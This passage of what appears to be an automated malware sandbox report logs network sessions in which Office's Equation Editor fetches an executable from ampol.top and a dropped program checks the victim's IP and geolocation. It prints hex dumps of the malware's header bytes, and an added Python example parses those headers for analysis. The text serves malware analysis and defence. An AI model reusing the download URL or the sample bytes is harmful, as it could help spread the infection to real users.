                    Jul 1, 2024 20:06:22.730767965 CEST | 320 | IN | HTTP/1.1 200 OK
                    Date: Mon, 01 Jul 2024 18:06:22 GMT
                    Content-Type: text/html
                    Content-Length: 103
                    Connection: keep-alive
                    Cache-Control: no-cache
                    Pragma: no-cache
                    X-Request-ID: ccc626da05dafa2d1266beafd6c908d1
                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                    Jul 1, 2024 20:06:22.948739052 CEST | 320 | IN | HTTP/1.1 200 OK
                    Date: Mon, 01 Jul 2024 18:06:22 GMT
                    Content-Type: text/html
                    Content-Length: 103
                    Connection: keep-alive
                    Cache-Control: no-cache
                    Pragma: no-cache
                    X-Request-ID: ccc626da05dafa2d1266beafd6c908d1
                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    5 | 192.168.2.22 | 49175 | 193.122.130.0 | 80 | 3244 | C:\Users\user\AppData\Roaming\obie8920193.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 1, 2024 20:06:23.467356920 CEST | 151 | OUT | GET / HTTP/1.1
                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                    Host: checkip.dyndns.org
                    Connection: Keep-Alive
                    Jul 1, 2024 20:06:23.963009119 CEST | 320 | IN | HTTP/1.1 200 OK
                    Date: Mon, 01 Jul 2024 18:06:23 GMT
                    Content-Type: text/html
                    Content-Length: 103
                    Connection: keep-alive
                    Cache-Control: no-cache
                    Pragma: no-cache
                    X-Request-ID: fb0cc70ac144307d5529684c02621d12
                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                    Jul 1, 2024 20:06:24.175595045 CEST | 320 | IN | HTTP/1.1 200 OK
                    Date: Mon, 01 Jul 2024 18:06:23 GMT
                    Content-Type: text/html
                    Content-Length: 103
                    Connection: keep-alive
                    Cache-Control: no-cache
                    Pragma: no-cache
                    X-Request-ID: fb0cc70ac144307d5529684c02621d12
                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    6 | 192.168.2.22 | 49177 | 193.122.130.0 | 80 | 3244 | C:\Users\user\AppData\Roaming\obie8920193.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 1, 2024 20:06:24.681402922 CEST | 151 | OUT | GET / HTTP/1.1
                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                    Host: checkip.dyndns.org
                    Connection: Keep-Alive
                    Jul 1, 2024 20:06:25.161417961 CEST | 320 | IN | HTTP/1.1 200 OK
                    Date: Mon, 01 Jul 2024 18:06:25 GMT
                    Content-Type: text/html
                    Content-Length: 103
                    Connection: keep-alive
                    Cache-Control: no-cache
                    Pragma: no-cache
                    X-Request-ID: a2ea309e2ef9afb19354f0e917b2de2c
                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                    Jul 1, 2024 20:06:25.375566006 CEST | 320 | IN | HTTP/1.1 200 OK
                    Date: Mon, 01 Jul 2024 18:06:25 GMT
                    Content-Type: text/html
                    Content-Length: 103
                    Connection: keep-alive
                    Cache-Control: no-cache
                    Pragma: no-cache
                    X-Request-ID: a2ea309e2ef9afb19354f0e917b2de2c
                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    0 | 192.168.2.22 | 49163 | 104.21.53.203 | 443 | 1804 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    Timestamp | Bytes transferred | Direction | Data
                    2024-07-01 18:06:08 UTC | 315 | OUT | GET /FcdBUj68lnCbMtB.exe HTTP/1.1
                    Accept: */*
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                    Host: ampol.top
                    Connection: Keep-Alive
                    2024-07-01 18:06:08 UTC | 739 | IN | HTTP/1.1 200 OK
                    Date: Mon, 01 Jul 2024 18:06:08 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 554504
                    Connection: close
                    Last-Modified: Mon, 01 Jul 2024 15:40:22 GMT
                    ETag: "6682cde6-87608"
                    Expires: Thu, 31 Dec 2037 23:55:55 GMT
                    Cache-Control: max-age=315360000
                    CF-Cache-Status: HIT
                    Age: 6345
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A7G4dorEJshtmnuTRvkFoBn7dNpaekvCms7H0CpUpilZTv8dAa9s%2BvQR%2BbRYMoBO%2BlV4oXDJRhxvRj%2BeD06tcN7KkWT%2BQ1TgpWBpo4IUCsWXL0iOOkRiMYFTrz4%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 89c854055ca60f9f-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-07-01 18:06:08 UTC | 630 | IN | Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 92 c5 82 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 18 08 00 00 20 00 00 00 00 00 00 d6 34 08 00 00 20 00 00 00 40 08 00 00 00 40 00 00 20 00 00 00 08 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 08 00 00 08 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf0 4 @@ @
                    2024-07-01 18:06:08 UTC | 1369 | IN | Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Data Ascii:
                    2024-07-01 18:06:08 UTC | 1369 | IN | Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 34 08 00 00 00 00 00 48 00 00 00 02 00 05 00 80 5f 00 00 4c 3a 00 00 03 00 00 00 38 00 00 06 cc 99 00 00 b8 9a 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 aa 02 73 14 00 00 0a 7d 05 00 00 04 02 73 15 00 00 0a 7d 06 00 00 04 02 17 7d 07 00 00 04 02 28 16 00 00 0a 02 28 17 00 00 06 2a 00 13 30 03 00 ac 00 00 00 00 00 00 00 02 7b 05 00 00 04 02 7b 0d 00 00 04 6f 17 00 00 0a 28 18 00 00 0a 6f 19 00 00 0a 02 7b 05 00 00 04 6f 1a 00 00 0a 18 33 2f 02 02 7b 06 00 00 04 6f 1b 00 00 0a 7d 04 00 00 04 02 02 02 7b 04 00 00 04 28 04 00 00
                    Data Ascii: 4H_L:8s}s}}((*0{{o(o{o3/{o}{(
                    2024-07-01 18:06:08 UTC1369INData Raw: 0d 00 00 04 6f 17 00 00 0a 1f 09 0a 12 00 28 21 00 00 0a 28 22 00 00 0a 6f 1f 00 00 0a 02 7b 21 00 00 04 25 6f 17 00 00 0a 1f 09 0a 12 00 28 21 00 00 0a 28 22 00 00 0a 6f 1f 00 00 0a 2a 00 00 13 30 03 00 44 00 00 00 01 00 00 11 02 7b 0d 00 00 04 02 7b 0d 00 00 04 6f 17 00 00 0a 16 0a 12 00 28 21 00 00 0a 28 22 00 00 0a 6f 1f 00 00 0a 02 7b 21 00 00 04 25 6f 17 00 00 0a 16 0a 12 00 28 21 00 00 0a 28 22 00 00 0a 6f 1f 00 00 0a 2a 13 30 03 00 c6 00 00 00 00 00 00 00 02 7b 05 00 00 04 02 7b 0d 00 00 04 6f 17 00 00 0a 28 18 00 00 0a 6f 19 00 00 0a 02 7b 05 00 00 04 6f 1a 00 00 0a 18 33 2f 02 02 7b 06 00 00 04 6f 1b 00 00 0a 7d 04 00 00 04 02 02 02 7b 04 00 00 04 28 04 00 00 06 7d 03 00 00 04 02 02 7b 03 00 00 04 28 03 00 00 06 02 7b 0d 00 00 04 6f 1c 00 00 0a
                    Data Ascii: o(!("o{!%o(!("o*0D{{o(!("o{!%o(!("o*0{{o(o{o3/{o}{(}{({o
                    2024-07-01 18:06:08 UTC1369INData Raw: 13 00 00 04 02 73 2e 00 00 0a 7d 14 00 00 04 02 73 2e 00 00 0a 7d 15 00 00 04 02 73 2e 00 00 0a 7d 16 00 00 04 02 73 2e 00 00 0a 7d 17 00 00 04 02 73 2e 00 00 0a 7d 18 00 00 04 02 73 2e 00 00 0a 7d 19 00 00 04 02 73 2e 00 00 0a 7d 1a 00 00 04 02 73 2e 00 00 0a 7d 1b 00 00 04 02 73 30 00 00 0a 7d 1c 00 00 04 02 73 31 00 00 0a 7d 1d 00 00 04 02 73 30 00 00 0a 7d 1e 00 00 04 02 73 30 00 00 0a 7d 1f 00 00 04 02 73 30 00 00 0a 7d 20 00 00 04 02 73 2f 00 00 0a 7d 21 00 00 04 02 7b 1c 00 00 04 6f 32 00 00 0a 02 7b 1d 00 00 04 6f 32 00 00 0a 02 7b 1e 00 00 04 6f 32 00 00 0a 02 7b 1f 00 00 04 6f 32 00 00 0a 02 7b 20 00 00 04 6f 32 00 00 0a 02 28 32 00 00 0a 02 7b 09 00 00 04 1e 1d 73 33 00 00 0a 6f 34 00 00 0a 02 7b 09 00 00 04 1e 1d 1e 1d 73 35 00 00 0a 6f 36 00
                    Data Ascii: s.}s.}s.}s.}s.}s.}s.}s.}s0}s1}s0}s0}s0} s/}!{o2{o2{o2{o2{ o2(2{s3o4{s5o6
                    2024-07-01 18:06:08 UTC1369INData Raw: 02 7b 11 00 00 04 1e 6f 3a 00 00 0a 02 7b 11 00 00 04 72 b7 00 00 70 6f 1f 00 00 0a 02 7b 11 00 00 04 17 6f 3b 00 00 0a 02 7b 11 00 00 04 02 fe 06 0a 00 00 06 73 3c 00 00 0a 6f 3d 00 00 0a 02 7b 12 00 00 04 1e 20 af 00 00 00 73 33 00 00 0a 6f 34 00 00 0a 02 7b 12 00 00 04 1e 1d 1e 1d 73 35 00 00 0a 6f 36 00 00 0a 02 7b 12 00 00 04 72 bb 00 00 70 6f 37 00 00 0a 02 7b 12 00 00 04 1f 5b 1f 51 73 38 00 00 0a 6f 39 00 00 0a 02 7b 12 00 00 04 1f 09 6f 3a 00 00 0a 02 7b 12 00 00 04 72 cb 00 00 70 6f 1f 00 00 0a 02 7b 12 00 00 04 17 6f 3b 00 00 0a 02 7b 12 00 00 04 02 fe 06 0b 00 00 06 73 3c 00 00 0a 6f 3d 00 00 0a 02 7b 13 00 00 04 1f 73 20 af 00 00 00 73 33 00 00 0a 6f 34 00 00 0a 02 7b 13 00 00 04 1e 1d 1e 1d 73 35 00 00 0a 6f 36 00 00 0a 02 7b 13 00 00 04 72
                    Data Ascii: {o:{rpo{o;{s<o={ s3o4{s5o6{rpo7{[Qs8o9{o:{rpo{o;{s<o={s s3o4{s5o6{r
                    2024-07-01 18:06:08 UTC1369INData Raw: 00 00 0a 02 7b 1b 00 00 04 1e 1d 1e 1d 73 35 00 00 0a 6f 36 00 00 0a 02 7b 1b 00 00 04 72 5b 01 00 70 6f 37 00 00 0a 02 7b 1b 00 00 04 20 93 00 00 00 1f 51 73 38 00 00 0a 6f 39 00 00 0a 02 7b 1b 00 00 04 1f 12 6f 3a 00 00 0a 02 7b 1b 00 00 04 72 67 01 00 70 6f 1f 00 00 0a 02 7b 1b 00 00 04 17 6f 3b 00 00 0a 02 7b 1b 00 00 04 02 fe 06 15 00 00 06 73 3c 00 00 0a 6f 3d 00 00 0a 02 7b 1c 00 00 04 6f 3e 00 00 0a 02 7b 15 00 00 04 6f 3f 00 00 0a 02 7b 1c 00 00 04 6f 3e 00 00 0a 02 7b 1a 00 00 04 6f 3f 00 00 0a 02 7b 1c 00 00 04 6f 3e 00 00 0a 02 7b 0b 00 00 04 6f 3f 00 00 0a 02 7b 1c 00 00 04 20 80 01 00 00 1f 69 73 33 00 00 0a 6f 34 00 00 0a 02 7b 1c 00 00 04 1e 1d 1e 1d 73 35 00 00 0a 6f 36 00 00 0a 02 7b 1c 00 00 04 72 71 01 00 70 6f 37 00 00 0a 02 7b 1c 00
                    Data Ascii: {s5o6{r[po7{ Qs8o9{o:{rgpo{o;{s<o={o>{o?{o>{o?{o>{o?{ is3o4{s5o6{rqpo7{
                    2024-07-01 18:06:08 UTC1369INData Raw: 00 00 1d 73 33 00 00 0a 6f 34 00 00 0a 02 7b 21 00 00 04 1e 1d 1e 1d 73 35 00 00 0a 6f 36 00 00 0a 02 7b 21 00 00 04 72 e5 01 00 70 6f 37 00 00 0a 02 7b 21 00 00 04 20 71 01 00 00 1f 26 73 38 00 00 0a 6f 39 00 00 0a 02 7b 21 00 00 04 1f 18 6f 3a 00 00 0a 02 22 00 00 80 41 22 00 00 f8 41 73 4c 00 00 0a 28 4d 00 00 0a 02 17 28 4e 00 00 0a 02 20 3b 03 00 00 20 c0 01 00 00 73 38 00 00 0a 28 4f 00 00 0a 02 28 3e 00 00 0a 02 7b 21 00 00 04 6f 3f 00 00 0a 02 28 3e 00 00 0a 02 7b 20 00 00 04 6f 3f 00 00 0a 02 28 3e 00 00 0a 02 7b 1f 00 00 04 6f 3f 00 00 0a 02 28 3e 00 00 0a 02 7b 1e 00 00 04 6f 3f 00 00 0a 02 28 3e 00 00 0a 02 7b 1c 00 00 04 6f 3f 00 00 0a 02 28 3e 00 00 0a 02 7b 0d 00 00 04 6f 3f 00 00 0a 02 06 72 f7 01 00 70 6f 50 00 00 0a 74 37 00 00 01 28 51
                    Data Ascii: s3o4{!s5o6{!rpo7{! q&s8o9{!o:"A"AsL(M(N ; s8(O(>{!o?(>{ o?(>{o?(>{o?(>{o?(>{o?rpoPt7(Q
                    2024-07-01 18:06:08 UTC1369INData Raw: 02 7b 2d 00 00 04 6f 17 00 00 0a 6f 62 00 00 0a 0a 02 7b 2d 00 00 04 06 6f 5c 00 00 0a 2a aa 02 7b 24 00 00 04 2c 13 04 6f 63 00 00 0a 02 7b 24 00 00 04 6f 63 00 00 0a 2e 01 2a 02 02 7b 2d 00 00 04 04 28 1f 00 00 06 2a 00 00 13 30 03 00 22 01 00 00 05 00 00 11 14 0a 16 0b 14 0c 14 0d 04 6f 63 00 00 0a 13 04 11 04 20 a1 00 00 00 30 2e 11 04 1f 10 30 0d 11 04 1e 2e 5f 11 04 1f 10 2e 59 2b 58 11 04 1f 25 59 19 36 4f 11 04 1f 2e 2e 49 11 04 20 a0 00 00 00 59 17 36 3e 2b 3d 11 04 20 c0 00 00 00 30 16 11 04 20 ba 00 00 00 2e 2a 11 04 20 bf 00 00 00 59 17 36 1f 2b 1e 11 04 20 db 00 00 00 59 1a 36 12 11 04 20 e2 00 00 00 2e 09 11 04 20 00 00 01 00 33 01 2a 03 6f 17 00 00 0a 0a 03 06 6f 64 00 00 0a 0b 07 16 3f 87 00 00 00 03 6f 65 00 00 0a 07 6f 66 00 00 0a 0c 03
                    Data Ascii: {-oob{-o\*{$,oc{$oc.*{-(*0"oc 0.0._.Y+X%Y6O..I Y6>+= 0 .* Y6+ Y6 . 3*ood?oeof
                    2024-07-01 18:06:08 UTC1369INData Raw: 2a 00 00 04 20 95 00 00 00 20 e5 00 00 00 73 33 00 00 0a 6f 34 00 00 0a 02 7b 2a 00 00 04 1e 16 1e 16 73 35 00 00 0a 6f 36 00 00 0a 02 7b 2a 00 00 04 72 9b 04 00 70 6f 37 00 00 0a 02 7b 2a 00 00 04 16 1f 20 73 38 00 00 0a 6f 39 00 00 0a 02 7b 2a 00 00 04 1a 6f 3a 00 00 0a 02 7b 2b 00 00 04 17 6f 74 00 00 0a 02 7b 2b 00 00 04 1f 20 20 49 01 00 00 73 33 00 00 0a 6f 34 00 00 0a 02 7b 2b 00 00 04 1e 16 1e 16 73 35 00 00 0a 6f 36 00 00 0a 02 7b 2b 00 00 04 72 a9 04 00 70 6f 37 00 00 0a 02 7b 2b 00 00 04 1f 51 1f 20 73 38 00 00 0a 6f 39 00 00 0a 02 7b 2b 00 00 04 1b 6f 3a 00 00 0a 02 7b 2b 00 00 04 72 b7 04 00 70 6f 1f 00 00 0a 02 7b 2c 00 00 04 17 6f 74 00 00 0a 02 7b 2c 00 00 04 20 95 00 00 00 20 49 01 00 00 73 33 00 00 0a 6f 34 00 00 0a 02 7b 2c 00 00 04 1e
                    Data Ascii: * s3o4{*s5o6{*rpo7{* s8o9{*o:{+ot{+ Is3o4{+s5o6{+rpo7{+Q s8o9{+o:{+rpo{,ot{, Is3o4{,
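Worked example added by the editor (not part of the Joe Sandbox report). The first dump above is the start of the downloaded file: the DOS header, the PE signature, the COFF header and the PE32 optional header all fall inside the 256 bytes the report prints. The third dump, once the zero padding that fills the headers out to 0x800 ends, opens the .text section with the 8-byte import address table (b8 34 08 00 00 00 00 00) followed by the CLR header (48 00 00 00 02 00 05 00 ...). The code below decodes exactly those transcribed bytes with Python's struct module, so a responder can read architecture, compile time, subsystem, mitigations, runtime version, entry-point token and the size of the managed resources before the whole file is in hand. Assumptions: the byte strings are transcribed from the two dumps; the field layouts are those of the PE/COFF and ECMA-335 (IMAGE_COR20_HEADER) specifications; the 554,504-byte file size is taken from the obie8920193.exe process record later in this report and is assumed to belong to this same download.

```python
import struct
from datetime import datetime, timezone

# Transcribed from the report's "Data Raw" dumps (added example data, not a complete file).
# PE_HEAD: first 248 bytes of the download = DOS header, "PE\0\0", COFF header and the
# PE32 optional header up to NumberOfRvaAndSizes.
PE_HEAD = bytes.fromhex(
    "4d5a90000300000004000000ffff0000" "b8000000000000004000000000000000"
    "00000000000000000000000000000000" "00000000000000000000000080000000"
    "0e1fba0e00b409cd21b8014ccd215468" "69732070726f6772616d2063616e6e6f"
    "742062652072756e20696e20444f5320" "6d6f64652e0d0d0a2400000000000000"
    "504500004c01030092c5826600000000" "00000000e00002010b01300000180800"
    "0020000000000000d634080000200000" "00400800000040000020000000080000"
    "04000000000000000400000000000000" "00800800000800000000000002004085"
    "00001000001000000000100000100000" "0000000010000000"
)
# CLR_HEAD: the 32 bytes after the 8-byte IAT at the start of .text in the third dump,
# i.e. the leading fields of IMAGE_COR20_HEADER (cb .. Resources.Size).
CLR_HEAD = bytes.fromhex("4800000002000500805f00004c3a00000300000038000006cc990000b89a0700")
DROPPED_FILE_SIZE = 554_504  # from the obie8920193.exe process record (assumed: same file)

COFF_HEADER = struct.Struct("<HHIIIHH")                          # 20 bytes after "PE\0\0"
OPT_HEADER32 = struct.Struct("<HBBIIIIIIIIIHHHHHHIIIIHHIIIIII")  # PE32 optional header, 96 bytes
COR20_HEAD = struct.Struct("<IHHIIIIII")                          # 32 bytes

FILE_FLAGS = {0x0002: "EXECUTABLE_IMAGE", 0x0020: "LARGE_ADDRESS_AWARE",
              0x0100: "32BIT_MACHINE", 0x2000: "DLL"}
DLL_FLAGS = {0x0040: "DYNAMIC_BASE", 0x0100: "NX_COMPAT", 0x0400: "NO_SEH",
             0x8000: "TERMINAL_SERVER_AWARE"}
COR_FLAGS = {0x1: "ILONLY", 0x2: "32BITREQUIRED", 0x8: "STRONGNAMESIGNED"}


def _flags(value: int, table: dict) -> list:
    return [name for bit, name in sorted(table.items()) if value & bit]


def parse_pe_head(data: bytes) -> dict:
    """Decode DOS/COFF/optional headers from the leading bytes of a PE32 image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not at e_lfanew")
    machine, nsections, stamp, _, _, _, chars = COFF_HEADER.unpack_from(data, e_lfanew + 4)
    opt = OPT_HEADER32.unpack_from(data, e_lfanew + 24)
    if opt[0] != 0x10B:
        raise ValueError("not a PE32 (32-bit) optional header")
    return {
        "e_lfanew": e_lfanew,
        "machine": machine,                        # 0x14c = i386
        "sections": nsections,
        "compiled": datetime.fromtimestamp(stamp, timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC"),
        "characteristics": _flags(chars, FILE_FLAGS),
        "linker_version": f"{opt[1]}.{opt[2]}",     # 48.0 is what the Roslyn C#/VB compilers write
        "entry_point": opt[6],
        "image_base": opt[9],
        "file_alignment": opt[11],
        "size_of_image": opt[19],
        "subsystem": opt[22],                      # 2 = WINDOWS_GUI (no console window)
        "dll_characteristics": _flags(opt[23], DLL_FLAGS),
    }


def parse_clr_head(data: bytes, file_size: int) -> dict:
    """Decode the leading IMAGE_COR20_HEADER fields and size the managed resources."""
    cb, major, minor, md_rva, md_size, flags, token, _res_rva, res_size = COR20_HEAD.unpack_from(data)
    if cb != 0x48:
        raise ValueError("unexpected IMAGE_COR20_HEADER size")
    return {
        "runtime_version": f"{major}.{minor}",
        "metadata_rva": md_rva,
        "metadata_size": md_size,
        "flags": _flags(flags, COR_FLAGS),
        "entry_point_token": token,                # 0x06xxxxxx = row in the MethodDef table
        "resources_size": res_size,
        "resources_share": round(res_size / file_size, 2),
    }


if __name__ == "__main__":
    for key, value in parse_pe_head(PE_HEAD).items():
        print(f"{key:20} {value}")
    for key, value in parse_clr_head(CLR_HEAD, DROPPED_FILE_SIZE).items():
        print(f"{key:20} {value}")
```

The headers describe a 32-bit, IL-only .NET executable with a compile stamp of 2024-07-01 15:04:50 UTC, about three hours before the sessions recorded above, with ASLR/DEP flags set and the GUI subsystem chosen so that nothing appears on screen. The managed resources account for roughly 90% of the file, which is where a .NET loader of this kind normally keeps its packed payload; that is the blob to carve and decode next.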


                    Session ID: 1
                    Source IP: 192.168.2.22
                    Source Port: 49165
                    Destination IP: 188.114.96.3
                    Destination Port: 443
                    PID: 3244
                    Process: C:\Users\user\AppData\Roaming\obie8920193.exe

                    Timestamp | Bytes transferred | Direction | Data
                    2024-07-01 18:06:16 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                    Host: reallyfreegeoip.org
                    Connection: Keep-Alive
                    2024-07-01 18:06:16 UTC | 710 | IN | HTTP/1.1 200 OK
                    Date: Mon, 01 Jul 2024 18:06:16 GMT
                    Content-Type: application/xml
                    Transfer-Encoding: chunked
                    Connection: close
                    access-control-allow-origin: *
                    vary: Accept-Encoding
                    Cache-Control: max-age=86400
                    CF-Cache-Status: HIT
                    Age: 13137
                    Last-Modified: Mon, 01 Jul 2024 14:27:19 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jEo2%2BvwMlARsNxjgDunSA8bcswE1d0VPkpwJJTHt8lcwE%2BwIgkAfUJKYG0cVamXvwlTVx1yJ218RrV5%2FNvVXEN12a1az8VVsodn3Y6cIVToKmsqO%2B1lK7qveyG20ANhPX9194i%2FS"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 89c854374cbcc3f0-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-07-01 18:06:16 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                    2024-07-01 18:06:16 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session ID: 2
                    Source IP: 192.168.2.22
